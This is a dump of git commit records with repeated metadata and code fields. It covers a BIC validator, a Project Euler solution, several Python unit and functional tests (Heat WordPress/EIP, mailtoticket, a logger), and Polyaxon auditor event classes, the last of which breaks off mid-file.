>>> validate('AGRIFRPP882')
'AGRIFRPP882'
>>> validate('AGRIFRPP')
'AGRIFRPP'
>>> validate('AGRIFRPP8')
Traceback (most recent call last):
...
InvalidLength: ..
>>> validate('AGRIF2PP') # country code can't contain digits
Traceback (most recent call last):
...
InvalidFormat: ..
>>> format('agriFRPP') # conventionally caps
'AGRIFRPP'
"""
import re
from stdnum.exceptions import *
from stdnum.util import clean
_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any surrounding whitespace."""
number = clean(number).strip()
return number
def validate(number):
"""Checks to see if the number provided is a valid routing number. This
checks the length and characters in each position."""
number = compact(number)
if len(number) not in (8, 11):
raise InvalidLength()
match = _bic_re.search(number)
if not match:
raise InvalidFormat()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid BIC. This checks the
length and characters in each position."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return number.upper()
|
<commit_before><commit_msg>Add ISO 9362 (BIC) support<commit_after># iso9362.py - functions for handling ISO 9362 Business identifier codes
#
# Copyright (C) 2015 Lifealike Ltd
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""ISO 9362 (Business identifier codes).
An ISO 9362 identifier (also: BIC, BEI, or SWIFT code) uniquely
identifies an institution. They are commonly used to route financial
transactions.
The code consists of a 4 letter institution code, a 2 letter country code,
and a 2 character location code, optionally followed by a three character
branch code.
>>> validate('AGRIFRPP882')
'AGRIFRPP882'
>>> validate('AGRIFRPP')
'AGRIFRPP'
>>> validate('AGRIFRPP8')
Traceback (most recent call last):
...
InvalidLength: ..
>>> validate('AGRIF2PP') # country code can't contain digits
Traceback (most recent call last):
...
InvalidFormat: ..
>>> format('agriFRPP') # conventionally caps
'AGRIFRPP'
"""
import re
from stdnum.exceptions import *
from stdnum.util import clean
_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any surrounding whitespace."""
number = clean(number).strip()
return number
def validate(number):
"""Checks to see if the number provided is a valid routing number. This
checks the length and characters in each position."""
number = compact(number)
if len(number) not in (8, 11):
raise InvalidLength()
match = _bic_re.search(number)
if not match:
raise InvalidFormat()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid BIC. This checks the
length and characters in each position."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return number.upper()
|
|
a74f20b573f98fb213ded92f4447140ac1f00e31
|
euler028.py
|
euler028.py
|
#!/usr/bin/python
count = 1
target = 3
step = 2
LIMIT = 1001
while step < LIMIT:
for i in range(4):
count += target
target += step
target += 2
step += 2
print(count)
|
Add solution for problem 28
|
Add solution for problem 28
|
Python
|
mit
|
cifvts/PyEuler
|
Add solution for problem 28
|
#!/usr/bin/python
count = 1
target = 3
step = 2
LIMIT = 1001
while step < LIMIT:
for i in range(4):
count += target
target += step
target += 2
step += 2
print(count)
|
<commit_before><commit_msg>Add solution for problem 28<commit_after>
|
#!/usr/bin/python
count = 1
target = 3
step = 2
LIMIT = 1001
while step < LIMIT:
for i in range(4):
count += target
target += step
target += 2
step += 2
print(count)
|
Add solution for problem 28#!/usr/bin/python
count = 1
target = 3
step = 2
LIMIT = 1001
while step < LIMIT:
for i in range(4):
count += target
target += step
target += 2
step += 2
print(count)
|
<commit_before><commit_msg>Add solution for problem 28<commit_after>#!/usr/bin/python
count = 1
target = 3
step = 2
LIMIT = 1001
while step < LIMIT:
for i in range(4):
count += target
target += step
target += 2
step += 2
print(count)
|
|
d656978e96489d7ce6cd0d91f90807ff2dc1f1ef
|
heat/tests/functional/test_WordPress_Single_Instance_With_EIP.py
|
heat/tests/functional/test_WordPress_Single_Instance_With_EIP.py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import nose
from nose.plugins.attrib import attr
from heat.common import context
from heat.engine import manager
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'eip'])
def test_template():
template = 'WordPress_Single_Instance_With_EIP.template'
func_utils = util.FuncUtils()
func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
func_utils.create_stack(template, 'F17')
func_utils.check_cfntools()
func_utils.wait_for_provisioning()
#func_utils.check_user_data(template)
ssh = func_utils.get_ssh_client()
# 1. ensure wordpress was installed
wp_file = '/etc/wordpress/wp-config.php'
stdin, stdout, sterr = ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# 2. check floating ip assignment
nclient = func_utils.get_nova_client()
if len(nclient.floating_ips.list()) == 0:
print 'zero floating IPs detected'
assert False
else:
found = 0
mylist = nclient.floating_ips.list()
for item in mylist:
if item.instance_id == func_utils.phys_rec_id:
print 'floating IP found', item.ip
found = 1
break
assert found == 1
func_utils.cleanup()
|
Add new functional test for WordPress_Single_Instance_With_EIP
|
Add new functional test for WordPress_Single_Instance_With_EIP
Change-Id: I483c5c32b9c29dc966bd154d760108292fcdbf5f
Signed-off-by: Jeff Peeler <d776211e63e47e40d00501ffdb86a800e0782fea@redhat.com>
|
Python
|
apache-2.0
|
cwolferh/heat-scratch,rh-s/heat,redhat-openstack/heat,steveb/heat,Triv90/Heat,citrix-openstack-build/heat,steveb/heat,miguelgrinberg/heat,takeshineshiro/heat,rh-s/heat,Triv90/Heat,pshchelo/heat,JioCloud/heat,pshchelo/heat,dims/heat,pratikmallya/heat,cryptickp/heat,cwolferh/heat-scratch,dims/heat,takeshineshiro/heat,dragorosson/heat,dragorosson/heat,pratikmallya/heat,miguelgrinberg/heat,gonzolino/heat,citrix-openstack-build/heat,gonzolino/heat,maestro-hybrid-cloud/heat,rickerc/heat_audit,srznew/heat,Triv90/Heat,jasondunsmore/heat,srznew/heat,openstack/heat,rickerc/heat_audit,NeCTAR-RC/heat,jasondunsmore/heat,cryptickp/heat,rdo-management/heat,maestro-hybrid-cloud/heat,NeCTAR-RC/heat,ntt-sic/heat,noironetworks/heat,varunarya10/heat,openstack/heat,rdo-management/heat,JioCloud/heat,noironetworks/heat,redhat-openstack/heat,varunarya10/heat,ntt-sic/heat
|
Add new functional test for WordPress_Single_Instance_With_EIP
Change-Id: I483c5c32b9c29dc966bd154d760108292fcdbf5f
Signed-off-by: Jeff Peeler <d776211e63e47e40d00501ffdb86a800e0782fea@redhat.com>
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import nose
from nose.plugins.attrib import attr
from heat.common import context
from heat.engine import manager
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'eip'])
def test_template():
template = 'WordPress_Single_Instance_With_EIP.template'
func_utils = util.FuncUtils()
func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
func_utils.create_stack(template, 'F17')
func_utils.check_cfntools()
func_utils.wait_for_provisioning()
#func_utils.check_user_data(template)
ssh = func_utils.get_ssh_client()
# 1. ensure wordpress was installed
wp_file = '/etc/wordpress/wp-config.php'
stdin, stdout, sterr = ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# 2. check floating ip assignment
nclient = func_utils.get_nova_client()
if len(nclient.floating_ips.list()) == 0:
print 'zero floating IPs detected'
assert False
else:
found = 0
mylist = nclient.floating_ips.list()
for item in mylist:
if item.instance_id == func_utils.phys_rec_id:
print 'floating IP found', item.ip
found = 1
break
assert found == 1
func_utils.cleanup()
|
<commit_before><commit_msg>Add new functional test for WordPress_Single_Instance_With_EIP
Change-Id: I483c5c32b9c29dc966bd154d760108292fcdbf5f
Signed-off-by: Jeff Peeler <d776211e63e47e40d00501ffdb86a800e0782fea@redhat.com><commit_after>
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import nose
from nose.plugins.attrib import attr
from heat.common import context
from heat.engine import manager
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'eip'])
def test_template():
template = 'WordPress_Single_Instance_With_EIP.template'
func_utils = util.FuncUtils()
func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
func_utils.create_stack(template, 'F17')
func_utils.check_cfntools()
func_utils.wait_for_provisioning()
#func_utils.check_user_data(template)
ssh = func_utils.get_ssh_client()
# 1. ensure wordpress was installed
wp_file = '/etc/wordpress/wp-config.php'
stdin, stdout, sterr = ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# 2. check floating ip assignment
nclient = func_utils.get_nova_client()
if len(nclient.floating_ips.list()) == 0:
print 'zero floating IPs detected'
assert False
else:
found = 0
mylist = nclient.floating_ips.list()
for item in mylist:
if item.instance_id == func_utils.phys_rec_id:
print 'floating IP found', item.ip
found = 1
break
assert found == 1
func_utils.cleanup()
|
Add new functional test for WordPress_Single_Instance_With_EIP
Change-Id: I483c5c32b9c29dc966bd154d760108292fcdbf5f
Signed-off-by: Jeff Peeler <d776211e63e47e40d00501ffdb86a800e0782fea@redhat.com># vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import nose
from nose.plugins.attrib import attr
from heat.common import context
from heat.engine import manager
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'eip'])
def test_template():
template = 'WordPress_Single_Instance_With_EIP.template'
func_utils = util.FuncUtils()
func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
func_utils.create_stack(template, 'F17')
func_utils.check_cfntools()
func_utils.wait_for_provisioning()
#func_utils.check_user_data(template)
ssh = func_utils.get_ssh_client()
# 1. ensure wordpress was installed
wp_file = '/etc/wordpress/wp-config.php'
stdin, stdout, sterr = ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# 2. check floating ip assignment
nclient = func_utils.get_nova_client()
if len(nclient.floating_ips.list()) == 0:
print 'zero floating IPs detected'
assert False
else:
found = 0
mylist = nclient.floating_ips.list()
for item in mylist:
if item.instance_id == func_utils.phys_rec_id:
print 'floating IP found', item.ip
found = 1
break
assert found == 1
func_utils.cleanup()
|
<commit_before><commit_msg>Add new functional test for WordPress_Single_Instance_With_EIP
Change-Id: I483c5c32b9c29dc966bd154d760108292fcdbf5f
Signed-off-by: Jeff Peeler <d776211e63e47e40d00501ffdb86a800e0782fea@redhat.com><commit_after># vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import nose
from nose.plugins.attrib import attr
from heat.common import context
from heat.engine import manager
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'eip'])
def test_template():
template = 'WordPress_Single_Instance_With_EIP.template'
func_utils = util.FuncUtils()
func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
func_utils.create_stack(template, 'F17')
func_utils.check_cfntools()
func_utils.wait_for_provisioning()
#func_utils.check_user_data(template)
ssh = func_utils.get_ssh_client()
# 1. ensure wordpress was installed
wp_file = '/etc/wordpress/wp-config.php'
stdin, stdout, sterr = ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# 2. check floating ip assignment
nclient = func_utils.get_nova_client()
if len(nclient.floating_ips.list()) == 0:
print 'zero floating IPs detected'
assert False
else:
found = 0
mylist = nclient.floating_ips.list()
for item in mylist:
if item.instance_id == func_utils.phys_rec_id:
print 'floating IP found', item.ip
found = 1
break
assert found == 1
func_utils.cleanup()
|
|
f3da7964fbdef7241d25dde2fd1489a64f710c36
|
test/test_reply.py
|
test/test_reply.py
|
import unittest
import mock
import settings
from soa.tiquets import GestioTiquets
from soa.identitat import GestioIdentitat
from filtres.reply import FiltreReply
from mailticket import MailTicket
class TestReply(unittest.TestCase):
def setUp(self):
self.tickets = mock.create_autospec(GestioTiquets)
self.tickets.consulta_tiquet_dades.return_value = {
"solicitant": "usuari.real",
"emailSolicitant": "mail.extern@mail.com"
}
self.identitat = mock.create_autospec(GestioIdentitat)
self.identitat.obtenir_uid.return_value = None
settings.init()
settings.set("regex_reply", "(.*)") # Una que trobi sempre algo
settings.set("regex_privat", "X") # Una que no trobi mai res
settings.set("usuari_extern", "usuari.extern")
def test_reply_mail_extern_igual_a_solicitant_detecta_usuari_real(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.real')
def test_reply_mail_extern_diferent_a_solicitant_detecta_usuari_extern(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern.diferent@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.extern')
if __name__ == '__main__':
unittest.main()
|
Test per comprovar la nova funcionalitat
|
Test per comprovar la nova funcionalitat
|
Python
|
agpl-3.0
|
UPC/mailtoticket,alexm/mailtoticket,UPC/mailtoticket,alexm/mailtoticket,aaguilera/mailtoticket,aaguilera/mailtoticket,jaumemoral/mailtoticket,jaumemoral/mailtoticket
|
Test per comprovar la nova funcionalitat
|
import unittest
import mock
import settings
from soa.tiquets import GestioTiquets
from soa.identitat import GestioIdentitat
from filtres.reply import FiltreReply
from mailticket import MailTicket
class TestReply(unittest.TestCase):
def setUp(self):
self.tickets = mock.create_autospec(GestioTiquets)
self.tickets.consulta_tiquet_dades.return_value = {
"solicitant": "usuari.real",
"emailSolicitant": "mail.extern@mail.com"
}
self.identitat = mock.create_autospec(GestioIdentitat)
self.identitat.obtenir_uid.return_value = None
settings.init()
settings.set("regex_reply", "(.*)") # Una que trobi sempre algo
settings.set("regex_privat", "X") # Una que no trobi mai res
settings.set("usuari_extern", "usuari.extern")
def test_reply_mail_extern_igual_a_solicitant_detecta_usuari_real(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.real')
def test_reply_mail_extern_diferent_a_solicitant_detecta_usuari_extern(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern.diferent@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.extern')
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Test per comprovar la nova funcionalitat<commit_after>
|
import unittest
import mock
import settings
from soa.tiquets import GestioTiquets
from soa.identitat import GestioIdentitat
from filtres.reply import FiltreReply
from mailticket import MailTicket
class TestReply(unittest.TestCase):
def setUp(self):
self.tickets = mock.create_autospec(GestioTiquets)
self.tickets.consulta_tiquet_dades.return_value = {
"solicitant": "usuari.real",
"emailSolicitant": "mail.extern@mail.com"
}
self.identitat = mock.create_autospec(GestioIdentitat)
self.identitat.obtenir_uid.return_value = None
settings.init()
settings.set("regex_reply", "(.*)") # Una que trobi sempre algo
settings.set("regex_privat", "X") # Una que no trobi mai res
settings.set("usuari_extern", "usuari.extern")
def test_reply_mail_extern_igual_a_solicitant_detecta_usuari_real(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.real')
def test_reply_mail_extern_diferent_a_solicitant_detecta_usuari_extern(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern.diferent@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.extern')
if __name__ == '__main__':
unittest.main()
|
Test per comprovar la nova funcionalitatimport unittest
import mock
import settings
from soa.tiquets import GestioTiquets
from soa.identitat import GestioIdentitat
from filtres.reply import FiltreReply
from mailticket import MailTicket
class TestReply(unittest.TestCase):
def setUp(self):
self.tickets = mock.create_autospec(GestioTiquets)
self.tickets.consulta_tiquet_dades.return_value = {
"solicitant": "usuari.real",
"emailSolicitant": "mail.extern@mail.com"
}
self.identitat = mock.create_autospec(GestioIdentitat)
self.identitat.obtenir_uid.return_value = None
settings.init()
settings.set("regex_reply", "(.*)") # Una que trobi sempre algo
settings.set("regex_privat", "X") # Una que no trobi mai res
settings.set("usuari_extern", "usuari.extern")
def test_reply_mail_extern_igual_a_solicitant_detecta_usuari_real(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.real')
def test_reply_mail_extern_diferent_a_solicitant_detecta_usuari_extern(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern.diferent@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.extern')
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Test per comprovar la nova funcionalitat<commit_after>import unittest
import mock
import settings
from soa.tiquets import GestioTiquets
from soa.identitat import GestioIdentitat
from filtres.reply import FiltreReply
from mailticket import MailTicket
class TestReply(unittest.TestCase):
def setUp(self):
self.tickets = mock.create_autospec(GestioTiquets)
self.tickets.consulta_tiquet_dades.return_value = {
"solicitant": "usuari.real",
"emailSolicitant": "mail.extern@mail.com"
}
self.identitat = mock.create_autospec(GestioIdentitat)
self.identitat.obtenir_uid.return_value = None
settings.init()
settings.set("regex_reply", "(.*)") # Una que trobi sempre algo
settings.set("regex_privat", "X") # Una que no trobi mai res
settings.set("usuari_extern", "usuari.extern")
def test_reply_mail_extern_igual_a_solicitant_detecta_usuari_real(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.real')
def test_reply_mail_extern_diferent_a_solicitant_detecta_usuari_extern(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern.diferent@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.extern')
if __name__ == '__main__':
unittest.main()
|
|
2660658a556d9f9bf511f18173b009db460b774b
|
tests/test_log.py
|
tests/test_log.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import io
from logging import StreamHandler
from unittest import TestCase
from logger import log
class TestLog(TestCase):
def test_set_level(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.WARN)
log.i("message")
self.assertEqual(out.getvalue(), "")
log.set_level(log.Level.INFO)
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d__byte(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d(b'message')
self.assertEqual(out.getvalue(), "message\n")
def test_i(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_w(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.w("message")
self.assertEqual(out.getvalue(), "message\n")
def test_e(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.e("message")
self.assertEqual(out.getvalue(), "message\n")
|
Add test case for log.py.
|
Add test case for log.py.
|
Python
|
mit
|
ujiro99/auto_logger,ujiro99/auto_logger
|
Add test case for log.py.
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import io
from logging import StreamHandler
from unittest import TestCase
from logger import log
class TestLog(TestCase):
def test_set_level(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.WARN)
log.i("message")
self.assertEqual(out.getvalue(), "")
log.set_level(log.Level.INFO)
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d__byte(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d(b'message')
self.assertEqual(out.getvalue(), "message\n")
def test_i(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_w(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.w("message")
self.assertEqual(out.getvalue(), "message\n")
def test_e(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.e("message")
self.assertEqual(out.getvalue(), "message\n")
|
<commit_before><commit_msg>Add test case for log.py.<commit_after>
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import io
from logging import StreamHandler
from unittest import TestCase
from logger import log
class TestLog(TestCase):
def test_set_level(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.WARN)
log.i("message")
self.assertEqual(out.getvalue(), "")
log.set_level(log.Level.INFO)
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d__byte(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d(b'message')
self.assertEqual(out.getvalue(), "message\n")
def test_i(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_w(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.w("message")
self.assertEqual(out.getvalue(), "message\n")
def test_e(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.e("message")
self.assertEqual(out.getvalue(), "message\n")
|
Add test case for log.py.#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import io
from logging import StreamHandler
from unittest import TestCase
from logger import log
class TestLog(TestCase):
def test_set_level(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.WARN)
log.i("message")
self.assertEqual(out.getvalue(), "")
log.set_level(log.Level.INFO)
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d__byte(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d(b'message')
self.assertEqual(out.getvalue(), "message\n")
def test_i(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_w(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.w("message")
self.assertEqual(out.getvalue(), "message\n")
def test_e(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.e("message")
self.assertEqual(out.getvalue(), "message\n")
|
<commit_before><commit_msg>Add test case for log.py.<commit_after>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import io
from logging import StreamHandler
from unittest import TestCase
from logger import log
class TestLog(TestCase):
def test_set_level(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.WARN)
log.i("message")
self.assertEqual(out.getvalue(), "")
log.set_level(log.Level.INFO)
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d__byte(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d(b'message')
self.assertEqual(out.getvalue(), "message\n")
def test_i(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_w(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.w("message")
self.assertEqual(out.getvalue(), "message\n")
def test_e(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.e("message")
self.assertEqual(out.getvalue(), "message\n")
|
|
7aa378e269d7c72cd36e79ab0fcfcda67e4dd261
|
polyaxon/auditor/events/experiment_group.py
|
polyaxon/auditor/events/experiment_group.py
|
import auditor
from libs.event_manager import event_types
from libs.event_manager.event import Event
class ExperimentGroupCreatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_CREATED
class ExperimentGroupUpdatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_UPDATED
class ExperimentGroupDeletedEvent(Event):
type = event_types.EXPERIMENT_GROUP_DELETED
class ExperimentGroupViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_VIEWED
class ExperimentGroupStoppedEvent(Event):
type = event_types.EXPERIMENT_GROUP_STOPPED
class ExperimentGroupResumedEvent(Event):
type = event_types.EXPERIMENT_GROUP_RESUMED
class ExperimentGroupFinishedEvent(Event):
type = event_types.EXPERIMENT_GROUP_FINISHED
class ExperimentGroupIterationEvent(Event):
type = event_types.EXPERIMENT_GROUP_ITERATION
class ExperimentGroupExperimentsViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_EXPERIMENTS
class ExperimentGroupRandomEvent(Event):
type = event_types.EXPERIMENT_GROUP_RANDOM
class ExperimentGroupGridEvent(Event):
type = event_types.EXPERIMENT_GROUP_GRID
class ExperimentGroupHyperbandEvent(Event):
type = event_types.EXPERIMENT_GROUP_HYPERBAND
class ExperimentGroupBOEvent(Event):
type = event_types.EXPERIMENT_GROUP_BO
auditor.register(ExperimentGroupCreatedEvent)
auditor.register(ExperimentGroupUpdatedEvent)
auditor.register(ExperimentGroupDeletedEvent)
auditor.register(ExperimentGroupViewedEvent)
auditor.register(ExperimentGroupStoppedEvent)
auditor.register(ExperimentGroupResumedEvent)
auditor.register(ExperimentGroupFinishedEvent)
auditor.register(ExperimentGroupExperimentsViewedEvent)
auditor.register(ExperimentGroupIterationEvent)
auditor.register(ExperimentGroupRandomEvent)
auditor.register(ExperimentGroupGridEvent)
auditor.register(ExperimentGroupHyperbandEvent)
auditor.register(ExperimentGroupBOEvent)
|
Add auditor experiment group's events
|
Add auditor experiment group's events
|
Python
|
apache-2.0
|
polyaxon/polyaxon,polyaxon/polyaxon,polyaxon/polyaxon
|
Add auditor experiment group's events
|
import auditor
from libs.event_manager import event_types
from libs.event_manager.event import Event
